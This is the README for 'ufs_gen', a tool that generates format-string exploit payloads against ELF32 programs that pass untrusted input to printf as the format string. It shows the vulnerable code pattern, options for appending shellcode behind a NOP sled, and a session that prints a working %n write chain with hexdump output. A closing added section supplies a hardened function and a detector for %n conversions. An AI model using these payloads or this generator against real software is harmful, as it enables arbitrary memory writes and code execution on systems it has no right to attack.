ufs_gen
=======
This software generates a payload that overwrites the value stored at an
address of your choice with a value of your choice.
The syntax is quite simple: three parameters are needed for the program to
run correctly.
  stackidx: the number of dwords that must be walked up the stack to reach the
            beginning of your buffer (the payload)
  override: the address to overwrite
  with:     the value to write at the overwritten address
This software is intended to work with an ELF32 binary built from code of the
following shape, where untrusted input ends up being used as the printf format
string. Example:
#include <stdio.h>
#include <string.h>

int function(const char *payload)
{
    char buffer[BUFSIZ];

    /* copy the untrusted input into a bounded, NUL-terminated buffer */
    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';
    printf(buffer);   /* the bug: the payload itself is the format string */
    return 0;
}
Support for ELF64 and other formats is planned but not written yet.
Although the 'addrsize' option can already be used to specify an address size
other than 4 bytes, there is very little chance that it works correctly.
Support for printf(payload) called directly (i.e. without a temporary buffer) is
also planned.
We support the options --prefix and --suffix, which respectively prepend and
append their argument to the payload.
We also support the option --sfxnops, which inserts n NOP bytes (0x90) between
the payload and the suffix.
Example
=======
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C
NOP bytes are at offset 52 (0x34)
suffix is at offset 152 (0x98)
00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".|
00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5|
00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x|
00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............|
00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D|
0000009f
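As an added example (not code from ufs_gen or its README), the C block below pairs the hardened form of the vulnerable function shown above with a small detector for the memory-writing conversions that make up the payload in the Example section (the %4$n ... %7$n chain). SAMPLE_PAYLOAD is the README's example payload rebuilt as a C literal; count_n_directives and function_fixed are names chosen here.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* The README's example payload, rebuilt as a C literal: four little-endian
 * target addresses followed by the %x/%n chain (52 bytes, matching the
 * "NOP bytes are at offset 52" line in the hexdump session). */
static const char SAMPLE_PAYLOAD[] =
    "\x44\x33\x22\x11" "\x45\x33\x22\x11" "\x46\x33\x22\x11" "\x47\x33\x22\x11"
    "%120x%4$n%239x%5$n%239x%6$n%239x%7$n";

/* Count the printf conversions in s that write to memory: "%n" and its
 * positional / length-modified forms ("%4$n", "%hhn", "%5$hn", ...).
 * "%%" is a literal percent sign and is skipped. User-supplied data has
 * no legitimate reason to contain such a conversion, so a non-zero result
 * for input that reaches a format argument is a strong signal, whether in
 * input validation or when triaging logs. */
int count_n_directives(const char *s)
{
    int count = 0;
    while (*s) {
        if (*s++ != '%')
            continue;
        if (*s == '%') {            /* "%%": not a conversion */
            s++;
            continue;
        }
        /* skip positional index ("4$"), flags, field width and precision */
        while (*s && (isdigit((unsigned char)*s) || strchr("$-+ #0.*", *s)))
            s++;
        /* skip length modifiers: hh, h, l, ll, j, z, t, L */
        while (*s && strchr("hljztL", *s))
            s++;
        if (*s == 'n')
            count++;
    }
    return count;
}

/* Hardened form of the README's function: the copied payload is passed as
 * an argument to a constant format string, so none of it is interpreted. */
int function_fixed(const char *payload)
{
    char buffer[BUFSIZ];
    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';
    printf("%s", buffer);           /* was: printf(buffer) */
    return 0;
}
```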
License
=======
This software is free software covered by the GPL license v2. Read the COPYING
file for the full terms.